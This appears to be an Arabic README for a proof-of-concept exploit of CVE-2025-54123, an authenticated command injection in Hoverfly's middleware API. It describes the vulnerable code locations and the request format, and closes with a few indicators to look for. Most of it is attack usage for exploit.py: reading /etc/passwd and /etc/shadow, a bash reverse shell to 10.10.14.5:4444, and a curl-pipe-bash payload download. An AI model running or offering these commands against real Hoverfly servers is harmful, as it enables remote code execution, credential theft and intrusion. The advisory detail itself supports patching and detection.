
CVE-2025-54123 Hoverfly حقن أوامر في Middleware المُصادَق عليه (RCE)
حقن أوامر في الوسيط (Middleware) بعد المصادقة في Hoverfly يؤدي إلى تنفيذ تعليمات برمجية عن بُعد (RCE) | CVSS 9.8 حرجة
الإصدارات Hoverfly <= 1.11.3 معرّضة لحقن الأوامر بعد المصادقة عبر نقطة النهاية /api/v2/hoverfly/middleware. يُشترط امتلاك بيانات اعتماد المسؤول، لكن بمجرد المصادقة، تقبل وظيفة الوسيط قيمًا ثنائية وسكربتات مقدمة من المستخدم دون تحقق، مما يسمح بتنفيذ أوامر عشوائية.
middleware.go مسارات ثنائية عشوائيةlocal_middleware.go مدخلات المستخدم مباشرة إلى exec.Command()hoverfly_service.go الوسيط أثناء التحققpython3 exploit.py -t <TARGET_URL> -u <USERNAME> -p <PASSWORD> -c <COMMAND> [--shell SHELL]
-t, --target - نقطة نهاية Hoverfly API (مطلوب)-u, --username - اسم مستخدم المسؤول (مطلوب)-p, --password - كلمة مرور المسؤول (مطلوب)-c, --command - الأمر المراد تنفيذه (مطلوب)--shell - ملف الشل الثنائي المستخدم (الافتراضي: /bin/bash)# Basic command execution
python3 exploit.py -t http://localhost:8888 -u admin -p password -c whoami
# Read sensitive files
python3 exploit.py -t http://10.10.11.100:8888 -u admin -p pass123 -c "cat /etc/passwd"
# Reverse shell
python3 exploit.py -t http://target:8888 -u user -p secret -c "bash -i >& /dev/tcp/10.10.14.5/4444 0>&1"
# Multi-command execution
python3 exploit.py -t http://192.168.1.50:8888 -u admin -p admin -c "id; uname -a; pwd"
# Use different shell
python3 exploit.py -t http://victim:8888 -u root -p toor -c "cat /etc/shadow" --shell /bin/sh
# Download and execute payload
python3 exploit.py -t http://target:8888 -u admin -p pass -c "curl http://10.10.14.5/shell.sh | bash"
/api/v2/hoverfly/middleware بحمولة خبيثة/tmp/hoverfly_<random><shell> /tmp/hoverfly_<random>{
"binary": "/bin/bash",
"script": "whoami"
}
تتضمن ترويسات HTTP ما يلي:
Authorization: Basic YWRtaW46cGFzc3dvcmQ=
Content-Type: application/json
core/middleware/middleware.go:94-96 - لا يوجد تحقق من المدخلات على معامل binarycore/middleware/local_middleware.go:14-19 - استخدام غير آمن للدالة exec.Command()core/hoverfly_service.go:173 - تنفيذ فوري أثناء التحققابحث عن:
/api/v2/hoverfly/middleware/tmp/hoverfly//api/v2/hoverfly/middlewareالاكتشاف الأصلي: @Kr1shna4agarwal